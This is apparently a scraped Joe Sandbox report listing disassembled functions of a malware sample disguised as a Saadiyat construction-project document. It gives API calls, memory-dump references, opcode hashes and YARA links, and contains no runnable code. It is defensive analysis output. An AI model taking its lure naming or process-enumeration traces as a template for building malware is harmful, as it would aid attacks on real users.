                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: malloc
                                                                                                                          • String ID: failed to allocate %u bytes of memory
                                                                                                                          • API String ID: 2803490479-1168259600
                                                                                                                          • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                                          • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                                                                          • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                                          • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                                                                          Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0041BDDF
                                                                                                                          • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcmpmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1065087418-0
                                                                                                                          • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                                          • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                          • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                                          • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                          Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                                          • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                                                                          • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                            • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                            • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                            • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1381354015-0
                                                                                                                          • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                                          • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                          • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                                          • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                          Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2221118986-0
                                                                                                                          • Opcode ID: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                                                                                                          • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                          • Opcode Fuzzy Hash: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                                                                                                          • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                          Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1294909896-0
                                                                                                                          • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                          • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                          • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                          • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                          Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                            • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                            • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2154303073-0
                                                                                                                          • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                          • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                          Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3150196962-0
                                                                                                                          • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                                                                          • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                          • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                                                                          • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                          Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$PointerRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3154509469-0
                                                                                                                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                          Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4232544981-0
                                                                                                                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                          Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeLibrary
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3664257935-0
                                                                                                                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                          Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$FileModuleName
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3859505661-0
                                                                                                                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                          Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                          Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3934441357-0
                                                                                                                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                          Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeLibrary
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3664257935-0
                                                                                                                          • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                          • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                          Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 823142352-0
                                                                                                                          • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                          • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                          • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                          • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                          Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 823142352-0
                                                                                                                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                          Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                          Memory Dump Source
